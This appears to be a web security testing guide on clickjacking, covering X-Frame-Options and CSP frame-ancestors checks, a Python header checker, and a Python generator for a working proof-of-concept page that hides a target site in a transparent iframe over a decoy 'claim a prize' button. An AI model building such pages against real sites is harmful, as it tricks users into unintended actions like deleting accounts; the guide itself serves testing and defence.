# Clickjacking

## Introduction

Clickjacking, also known as a "UI redress attack", is a web vulnerability in which an attacker tricks a user into clicking a button or link that performs an action the user did not intend. The attacker's page loads the target site in an `iframe` that is made transparent (or nearly so) and positioned on top of decoy content, so the click the victim believes to be on the decoy actually lands on a control of the framed target page. The victim is usually unaware of this, because only the decoy is visible.

## Testing the attack

To check whether a page is vulnerable to this kind of attack, inspect the HTTP response headers of the page you want to frame and see whether one of the following mechanisms is in place.

### X-Frame-Options

`X-Frame-Options` is a response header that tells the browser whether the page may be rendered inside a frame. Setting it to `deny` prevents the page from being framed by any site, including its own origin, which defeats clickjacking because the attacker cannot load the page in an iframe at all. The header must be sent as an HTTP response header; browsers ignore it in a `<meta>` tag.

Framing can also be limited to pages of the same origin with the `sameorigin` directive. An `allow-from` directive that named a single permitted site once existed, but it is obsolete: it was never supported by Chrome or Safari and has been removed from Firefox, so current browsers treat the value as unrecognised and allow framing. Flag it as a finding if you see it, and use the CSP `frame-ancestors` directive to allow specific sites instead. The obsolete form looks like this:

```http
X-Frame-Options: allow-from https://example.com
```

### Content Security Policy (CSP)

`Content-Security-Policy` is a response header that lists the sources the browser may load various kinds of content from (scripts, stylesheets, images, and so on) and, through the `frame-ancestors` directive, which origins may embed the page in a frame. The header value is a list of directives separated by semicolons, and the browser enforces it on the page the header was delivered with.

The recommended clickjacking protection is the `frame-ancestors` directive. `frame-ancestors 'none'` behaves like `X-Frame-Options: deny`, and `frame-ancestors 'self'` is broadly equivalent to `X-Frame-Options: sameorigin`. When a response carries both an enforced CSP containing `frame-ancestors` and an `X-Frame-Options` header, browsers apply the CSP directive and ignore `X-Frame-Options`, so check the CSP first. A `Content-Security-Policy-Report-Only` header only reports violations and blocks nothing. Like `X-Frame-Options`, `frame-ancestors` is ignored when set in a `<meta>` tag. The following CSP restricts framing to the same origin only:

```http
Content-Security-Policy: frame-ancestors 'self';
```

Alternatively, framing can be restricted to named sites (several may be listed, separated by spaces):

```http
Content-Security-Policy: frame-ancestors normal-website.com;
```

A policy such as `frame-ancestors *`, or one using a scheme-only source like `https:`, allows any site to frame the page and offers no protection.
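The following script is an added example, not part of the original guide or of any tool it mentions: it applies the rules above to a set of response headers and reports whether an arbitrary third-party site can frame the page. The sample header sets are constructed for the example; the header names and the CSP-over-`X-Frame-Options` precedence rule are the real ones, and the `FramingVerdict` type and `framing_verdict` function are names chosen here.

```python
from dataclasses import dataclass


@dataclass
class FramingVerdict:
    frameable: bool   # True when an arbitrary third-party origin can frame the page
    mechanism: str    # header that decided the verdict: "CSP", "XFO" or "none"
    detail: str       # short explanation for the report


def _header_values(headers, name):
    """All values of a header, matched case-insensitively.

    Accepts a dict or a list of (name, value) pairs, because a response
    may legitimately carry the same header more than once."""
    items = headers.items() if isinstance(headers, dict) else headers
    return [v for k, v in items if k.lower() == name.lower()]


def _frame_ancestors(policy):
    """Source list of the frame-ancestors directive in one policy, or None if absent."""
    for directive in policy.split(";"):
        tokens = directive.split()
        if tokens and tokens[0].lower() == "frame-ancestors":
            return [t.lower() for t in tokens[1:]]
    return None


def framing_verdict(headers):
    # 1. An enforced CSP that contains frame-ancestors wins: the browser ignores
    #    X-Frame-Options in that case. Report-Only policies never block anything,
    #    so they are deliberately not consulted.
    for policy in _header_values(headers, "Content-Security-Policy"):
        sources = _frame_ancestors(policy)
        if sources is None:
            continue
        if not sources or "'none'" in sources:
            return FramingVerdict(False, "CSP", "frame-ancestors 'none': nobody may frame this page")
        if "*" in sources or any(s in ("http:", "https:") for s in sources):
            return FramingVerdict(True, "CSP", "frame-ancestors allows any origin: " + " ".join(sources))
        return FramingVerdict(False, "CSP", "frame-ancestors restricted to: " + " ".join(sources))

    # 2. Otherwise fall back to X-Frame-Options (values may also be comma-joined).
    xfo = [v.strip().upper()
           for raw in _header_values(headers, "X-Frame-Options")
           for v in raw.split(",")]
    if xfo:
        if len(set(xfo)) > 1 and set(xfo) & {"DENY", "SAMEORIGIN"}:
            # Conflicting recognised values: browsers refuse to render the framed page.
            return FramingVerdict(False, "XFO", "conflicting values, page is not rendered: " + ", ".join(xfo))
        value = xfo[0]
        if value == "DENY":
            return FramingVerdict(False, "XFO", "DENY: nobody may frame this page")
        if value == "SAMEORIGIN":
            return FramingVerdict(False, "XFO", "SAMEORIGIN: only same-origin framing")
        if value.startswith("ALLOW-FROM"):
            return FramingVerdict(True, "XFO", "ALLOW-FROM is obsolete and ignored by current browsers")
        return FramingVerdict(True, "XFO", f"unrecognised value {value!r} is ignored by browsers")

    return FramingVerdict(True, "none", "no X-Frame-Options and no CSP frame-ancestors")


# Constructed header sets for the example; not captured from any real site.
SAMPLE_RESPONSES = {
    "unprotected": {"Content-Type": "text/html"},
    "xfo_deny": {"X-Frame-Options": "DENY"},
    "csp_self": {"Content-Security-Policy": "default-src 'self'; frame-ancestors 'self'"},
    "csp_overrides_xfo": {"X-Frame-Options": "DENY", "Content-Security-Policy": "frame-ancestors *"},
    "report_only": {"Content-Security-Policy-Report-Only": "frame-ancestors 'none'"},
    "obsolete_allow_from": {"X-Frame-Options": "ALLOW-FROM https://example.com"},
}


if __name__ == "__main__":
    for name, headers in SAMPLE_RESPONSES.items():
        v = framing_verdict(headers)
        print(f"{name:20} frameable={v.frameable!s:5} via {v.mechanism}: {v.detail}")
```

Feed it the headers of the exact page you intend to frame (for example the `headers` of a `requests` response); the protection lives on the framed page's response, not on the site's front page, so a login or settings page must be checked on its own. The `csp_overrides_xfo` case is the one most often misjudged by hand: the `DENY` looks protective, but the lax `frame-ancestors *` beside it is what the browser enforces.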

### Proof of Concept

If neither of these server-side mechanisms is applied, the page can be vulnerable to clickjacking. Confirm it with a proof of concept: if the target renders inside your frame, the finding is real; if the browser shows a blank frame or refuses to load it, a protection is in place. Bear in mind that an attack on an authenticated action also depends on the victim's session cookie being sent to the framed page: cookies marked `SameSite=Strict` or `SameSite=Lax` are not sent on cross-site iframe requests (and Chromium-based browsers treat cookies without a `SameSite` attribute as `Lax` by default), so the framed page may render logged-out even when no framing header is present.

Here is how a clickjacking attack works:

1. The attacker creates a webpage that loads the target page in a transparent iframe positioned on top of decoy content, aligning the target's sensitive button with a visible decoy button. This can be done by hand or with the Burp Suite tool [Clickbandit](https://portswigger.net/burp/documentation/desktop/tools/clickbandit).
2. The victim navigates to the attacker's webpage, which appears to be a harmless site.
3. The victim clicks the decoy button, believing they are performing a harmless action.
4. The click actually lands on the invisible iframe, which delivers it to the target page and performs an unintended action there, such as liking a post on a social media site or confirming a purchase.
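The generator below is an added example of the page described in these steps; it is not Clickbandit's output nor code from the original guide. It builds the attacker page by hand: a decoy button underneath, and the target page in a near-invisible iframe on top, shifted so that the target's sensitive control sits exactly under the decoy. The target URL, labels and coordinates are assumptions chosen for the example, and `build_poc` and `write_poc` are names chosen here.

```python
import html

# Constructed PoC skeleton. CSS braces are doubled because the string goes through str.format().
POC_TEMPLATE = """<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>{title}</title>
<style>
  body {{ margin: 0; }}
  /* Decoy the victim believes they are clicking; it sits underneath and is purely visual. */
  #decoy {{ position: absolute; top: {decoy_top}px; left: {decoy_left}px; z-index: 1; }}
  /* The target page, framed and (almost) invisible, sits ON TOP so it receives the click.
     The negative offsets scroll the target's sensitive control under the decoy button. */
  #target {{
    position: absolute; top: {frame_top}px; left: {frame_left}px;
    width: {width}px; height: {height}px; border: 0;
    opacity: {opacity}; z-index: 2;
  }}
</style>
</head>
<body>
<div id="decoy"><button>{decoy_label}</button></div>
<iframe id="target" src="{target_url}"></iframe>
</body>
</html>
"""


def build_poc(target_url, decoy_label, button_x, button_y,
              decoy_top=100, decoy_left=100, width=1280, height=800, opacity=0.0001):
    """Return the HTML of a clickjacking PoC page.

    button_x / button_y are the coordinates of the sensitive control inside the
    target page (measure them with opacity=0.5 so both layers are visible). The
    frame is offset so that control lands exactly under the decoy button placed
    at (decoy_left, decoy_top). Values are HTML-escaped so a label or URL cannot
    break out of the template."""
    return POC_TEMPLATE.format(
        title="Win a prize!",
        target_url=html.escape(target_url),
        decoy_label=html.escape(decoy_label),
        decoy_top=decoy_top,
        decoy_left=decoy_left,
        frame_top=decoy_top - button_y,
        frame_left=decoy_left - button_x,
        width=width,
        height=height,
        opacity=opacity,
    )


def write_poc(path, **kwargs):
    """Write the PoC to disk and return the HTML that was written."""
    page = build_poc(**kwargs)
    with open(path, "w", encoding="utf-8") as fh:
        fh.write(page)
    return page


if __name__ == "__main__":
    # Alignment pass first: opacity 0.5 shows both layers while you tune button_x / button_y.
    # Once aligned, drop opacity back to the default so only the decoy is visible.
    print(build_poc("https://target.example/account/delete", "Click to claim", 420, 310, opacity=0.5))
```

Open the generated file in a browser while logged in to the target. If the target page renders inside the frame and the decoy click triggers the action, the page is clickjackable; a blank or refused frame means `X-Frame-Options` or `frame-ancestors` is doing its job. A very small non-zero opacity is used rather than `0` only so the frame is still treated as rendered content; it makes no visible difference to the victim.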

## References

* [Clickjacking (UI redressing)](https://portswigger.net/web-security/clickjacking)
* [Testing for Clickjacking](https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/11-Client-side_Testing/09-Testing_for_Clickjacking)
* [Clickjacking Defense Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Clickjacking_Defense_Cheat_Sheet.html)
